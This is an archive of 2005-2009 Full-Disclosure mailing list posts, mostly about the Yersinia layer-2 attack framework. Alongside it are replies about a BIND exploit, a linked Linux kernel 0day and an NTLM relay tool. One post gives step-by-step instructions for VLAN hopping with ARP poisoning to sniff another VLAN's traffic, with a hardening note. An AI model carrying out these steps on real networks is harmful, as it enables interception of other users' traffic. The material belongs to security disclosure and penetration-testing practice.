>>>> kcope
>>>>
>>>> 2009/7/30 Kingcope :
>>>> > I own nothing.
>>>> >
>>>> > Cheers,
>>>> >
>>>> > kcope
>>>> >
>>
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] THISISNOTMYEXPLOIT

2009-07-30 Thread yersinia
Repost for mailing problem.
On Fri, Jul 31, 2009 at 12:14 AM, yersinia  wrote:
>
> On Thu, Jul 30, 2009 at 1:24 PM, Kingcope  wrote:
>>
>> Hello again,
>> the default setting of 127.in-addr.arpa is a bit weird
>>
>> try
>> ./bind  localhost
>
> Never mind. I have only a warning from gcc because it was necessary to
> include stdlib.h for malloc.
>
> But, the important thing is that it works as expected.
>
> Regards
>>
>> lewls
>>
>> XD
>>
>> kcope
>>
>> 2009/7/30 Kingcope :
>> > I own nothing.
>> >
>> > Cheers,
>> >
>> > kcope
>> >

>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] THISISNOTMYEXPLOIT

2009-07-30 Thread yersinia
On Thu, Jul 30, 2009 at 1:24 PM, Kingcope  wrote:

> Hello again,
> the default setting of 127.in-addr.arpa is a bit weird
>
> try
> ./bind  localhost
>

Never mind. I have only a warning from gcc because it was necessary to
include stdlib.h for malloc.

But, the important thing is that it works as expected.

Regards

>
> lewls
>
> XD
>
> kcope
>
> 2009/7/30 Kingcope :
> > I own nothing.
> >
> > Cheers,
> >
> > kcope
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Gerix Wifi Cracker NG

2009-07-27 Thread yersinia
On Mon, Jul 27, 2009 at 8:45 PM,  wrote:
> AntiSec is against heterosexual relations and wifi cracking. AntiSec
> is also against flooding the premier channel for hacker
> communications, the full disclosure mailing list, with erroneous
> posts about useless tools. Remember to use chkrootkit for backdoors.

Being peasants is one thing, it makes sense. Being stupid is not. And it
makes this popular mailing list an area for people who have nothing to
do and, what is worse, nothing to say.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable

2009-07-17 Thread yersinia
On Fri, Jul 17, 2009 at 4:26 AM, Brad Spengler wrote:
> Title says it all, exploit is at:
> http://grsecurity.net/~spender/cheddar_bay.tgz
>
> Everything is described and explained in the exploit.c file.
> I exploit a bug that by looking at the source is unexploitable;
> I defeat the null ptr dereference protection in the kernel on
> both systems with SELinux and those without.
> I proceed to disable SELinux/AppArmor/LSM/auditing
>
> Exploit works on both 32bit and 64bit kernels.
>
> Links to videos of the exploit in action are present in the exploit
> code.

Awesome, very informative as usual. I have forwarded it to dailydave (so
as to permit sgrubb to pick it up) and to oss-security also.
BTW, it would be nice and perhaps useful for the casual reader to update
your comments on
http://magazine.redhat.com/2007/05/04/whats-new-in-selinux-for-red-hat-enterprise-linux-5/
with this.

Best regards

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] nVidia.com [Url Redirection flaw]

2009-03-25 Thread yersinia
2009/3/24 Rubén Camarero 

> If ATI and nVidia were web content developers, this may be a valid
> argument, but they are not. They are graphics vendors, hardware and
> software. Not to mention the fact that this isn't a "serious" issue. RFI is
> a serious issue, IMHO.
>

Well, not everyone agreed with your opinion.

http://www.owasp.org/index.php/Open_redirect

http://www.xssed.com/article/26/Open_redirect_vulnerabilities_definition_and_prevention/


http://www.net-security.org/dl/insecure/INSECURE-Mag-17.pdf
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows 7 or KDE4?

2009-02-27 Thread yersinia
Wonderful.

On Fri, Feb 27, 2009 at 1:49 AM, Ivan .  wrote:

> http://olylug.org/read.php?73,13757
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] NTLM Multiprotocol Replay attacks

2008-11-16 Thread yersinia
smbrelay was originally created, some years ago, by CDC. M$ SMB signing made it
historic. Is this tool an evolution of it?

Regards

On Fri, Nov 14, 2008 at 9:37 PM, Andres Tarasco <[EMAIL PROTECTED]> wrote:

> I have published a new proof of concept tool, named "Smbrelay3", that is
> able to replay NTLM authentication from several protocols like
> SMB/HTTP/IMAP/..
> http://www.tarasco.org/security/smbrelay/index.html
>
>
> Andrés Tarascó
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Yersinia new version (added 802.1x support/attack)

2006-06-18 Thread Yersinia Authors
Hello,
just to inform you that there is a new Yersinia version (0.7) with 802.1x
support. In addition, with lots of bugfixes and a new GTK interface.

The entire core has been redeveloped to support easy addition of new
protocols and attacks, and with the new GTK interface the tool is ready
for the masses :)

You can download it from http://www.yersinia.net.

Yersinia 0.7: http://www.yersinia.net/download/yersinia-0.7.tar.gz
Yersinia 0.7 signature:
http://www.yersinia.net/download/yersinia-0.7.tar.gz.asc

Yersinia authors' public key: http://www.yersinia.net/yersinia.asc

As always, any bug, comment, suggestion or doubt can be sent to
[EMAIL PROTECTED]

Thanks

Alfredo Andres (slay) and David Barroso (tomac).

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] VLAN Hopping, myth or reality?

2005-09-19 Thread Yersinia Authors
Hello,
just some thoughts added to the eternal discussion about VLAN Hopping
(802.1q double encapsulated attacks, trunking, ... see the @stake paper or
the Sean Convery BH presentation).

There are lots of resources on the Internet talking about those attacks in
a theoretical way, but we weren't able to find any implementation, so here is
a step by step guide to perform a VLAN Hopping + ARP Poisoning, allowing
a user to sniff and (why not?) perform a mitm attack against another user
in another VLAN.

The tool described here, yersinia, can do this, among other fancy
features.

Note for the network administrators: this attack can be avoided just by
properly configuring your switch DTP settings in each port (disabling
trunking).

Steps:
1.- Start yersinia graphical mode: yersinia -I
2.- Select the network interfaces you want to use ('i')
3.- Wait for some minutes (~3 minutes). If you see DTP traffic, the attack
can be accomplished; if not, we are sorry. We need to set up the trunk: go
to DTP mode (F5 or press 'g'), press 'd' to initialize default values,
then 'x' (attacks) and then '1' ('enabling trunking'); you should be able
to see some other DTP packets.
4.- Switch to 802.1q mode (F6 or press 'g'). There should be some packets
there, most of them related to spanning tree or broadcast traffic.
5.- For this attack, we need to know:
  a) Victim's VLAN
  b) Victim's gateway IP Address.
  c) A host in the victim's network segment that is not alive.
  Press 'd' to initialize default values, and then 'x', then '2' (sending
802.1q arp poisoning). Then fill in those three values, and suddenly, you
should be able to see the traffic generated by the victim and destined
to the gateway :)

If you look around yersinia options, there is a useful option that saves
all the traffic in pcap format, so you can sniff the victim network data
and save it automatically in a file.

Of course, this attack can only be performed locally.

We have tested this attack only against Cisco 29xx switches, so we would
be pleased if we received notifications of working attacks on other Cisco
models, or better, other vendors (which is almost impossible since DTP is
Cisco proprietary, but, we've seen HP switches with CDP enabled ;) )

Yersinia: http://yersinia.sourceforge.net

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
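The note for administrators above says the attack is avoided by fixing the DTP settings on each port. As an added example, not part of the original post or of the yersinia project, here is a Cisco IOS-style port configuration showing the negotiating setting that lets a host talk a trunk into existence, beside hardened access-port and uplink settings. Interface names and VLAN numbers are assumptions.

```cisco
! Constructed example (not from the yersinia authors). Interface names
! and VLAN numbers are assumptions; adapt them to your switch.
!
! WEAK: the port negotiates its mode with whatever is plugged in. A host
! that sends DTP "desirable" frames is granted a trunk carrying every
! VLAN. "dynamic desirable" (the default on older Catalyst models) has
! the same problem.
interface FastEthernet0/1
 switchport mode dynamic auto
!
! HARDENED access port: pinned to access mode on a single VLAN, and
! "nonegotiate" stops the switch from sending or honouring DTP at all.
interface FastEthernet0/1
 switchport mode access
 switchport access vlan 10
 switchport nonegotiate
!
! HARDENED uplink: trunking is configured explicitly (no DTP), only the
! VLANs actually needed are carried, and the native VLAN is moved to an
! unused ID so the outer tag of a double-tagged (802.1q-in-802.1q) frame
! cannot match a VLAN that any host sits on.
! On platforms that also offer ISL, add "switchport trunk encapsulation
! dot1q" before "switchport mode trunk".
interface GigabitEthernet0/1
 switchport mode trunk
 switchport trunk native vlan 999
 switchport trunk allowed vlan 10,20,30
 switchport nonegotiate
!
! Unused ports: access mode on the parking VLAN, and shut down.
interface range FastEthernet0/20 - 24
 switchport mode access
 switchport access vlan 999
 switchport nonegotiate
 shutdown
```

To verify a port, `show interfaces FastEthernet0/1 switchport` should report the administrative mode as static access (or trunk for the uplink) and negotiation of trunking as off; if you then watch the port with yersinia as in step 3 above, no DTP frames should appear.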


[Full-disclosure] Yersinia, a framework for layer 2 attacks

2005-04-04 Thread Yersinia Authors
Hi,
we are pleased to announce the release of Yersinia, a framework for (mainly)
layer 2 attacks. The tool has been presented at BlackHat Europe 2005, so any
of you who could attend the conference will know what it is about.

Yersinia implements several attacks for the following protocols: Spanning
Tree (STP), Cisco Discovery (CDP), Dynamic Host Configuration (DHCP), Hot
Standby Router (HSRP), Dynamic Trunking (DTP), 802.1q and VLAN Trunking (VTP),
helping the pen-tester in different tasks, e.g.:

- Becoming the root role in the Spanning Tree
- Creating virtual CDP neighbors
- Setting up rogue DHCP Servers
- Becoming the active router in a HSRP scenario
- Enabling trunking
- Performing ARP spoofing over VLAN Hopping
- Adding/deleting VLANs (via VTP)
- more...

It is a multithreaded application with three main modes: command line, network
client and ncurses GUI, allowing multiple users to launch multiple attacks
simultaneously.

Besides, you can decode some Cisco proprietary protocols like DTP or
VTP!!

You can download it from http://yersinia.sf.net and send your doubts,
questions, bugs or greetings to [EMAIL PROTECTED]

Best regards and happy trails :)

David Barroso Berrueta
Alfredo Andres Omella
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/